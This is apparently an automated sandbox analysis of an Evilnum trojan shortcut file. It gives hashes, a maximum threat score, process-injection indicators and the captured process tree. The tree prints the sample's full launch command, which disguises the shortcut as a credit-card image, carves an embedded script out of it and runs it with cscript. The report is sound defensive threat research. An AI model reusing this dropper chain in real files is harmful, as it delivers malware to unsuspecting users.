evilnum | 7d643b369be21f07be4893097084e685f8ea7583d01f19ece6ee3bb86cec062e

Analysis

Target

7d643b369be21f07be4893097084e685f8ea7583d01f19ece6ee3bb86cec062e.lnk
Size

473KB
MD5

768ef933f1a00f2996fc957a35c56c95
SHA1

b6767e63cc8483444540d701f00705b65055c69b
SHA256

7d643b369be21f07be4893097084e685f8ea7583d01f19ece6ee3bb86cec062e
SHA512

9a242ad931072c9e59c8118100b510b23623d40ee017dd29cde2ba360a03d43e87e9bd2f83f89c8cd322a1cd63a95374ad8e27cbafa13eef5f7b00da637d2f22

Score

10^/10

evilnum trojan

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1840 wrote to memory of 928	1840	cmd.exe	70
PID 1840 wrote to memory of 928	1840	cmd.exe	70
PID 928 wrote to memory of 804	928	cmd.exe	71
PID 928 wrote to memory of 804	928	cmd.exe	71
PID 928 wrote to memory of 1108	928	cmd.exe	72
PID 928 wrote to memory of 1108	928	cmd.exe	72
PID 928 wrote to memory of 1296	928	cmd.exe	73
PID 928 wrote to memory of 1296	928	cmd.exe	73
PID 928 wrote to memory of 1192	928	cmd.exe	74
PID 928 wrote to memory of 1192	928	cmd.exe	74
PID 928 wrote to memory of 1400	928	cmd.exe	75
PID 928 wrote to memory of 1400	928	cmd.exe	75

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\7d643b369be21f07be4893097084e685f8ea7583d01f19ece6ee3bb86cec062e.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1840
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Credit Card Front.png.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Cred*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:928
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Cred*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:1108
- - C:\Windows\system32\find.exe
    find "TRU4"
    3⤵
    PID:1296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:1192
- - C:\Windows\system32\cscript.exe
    cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:1400

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact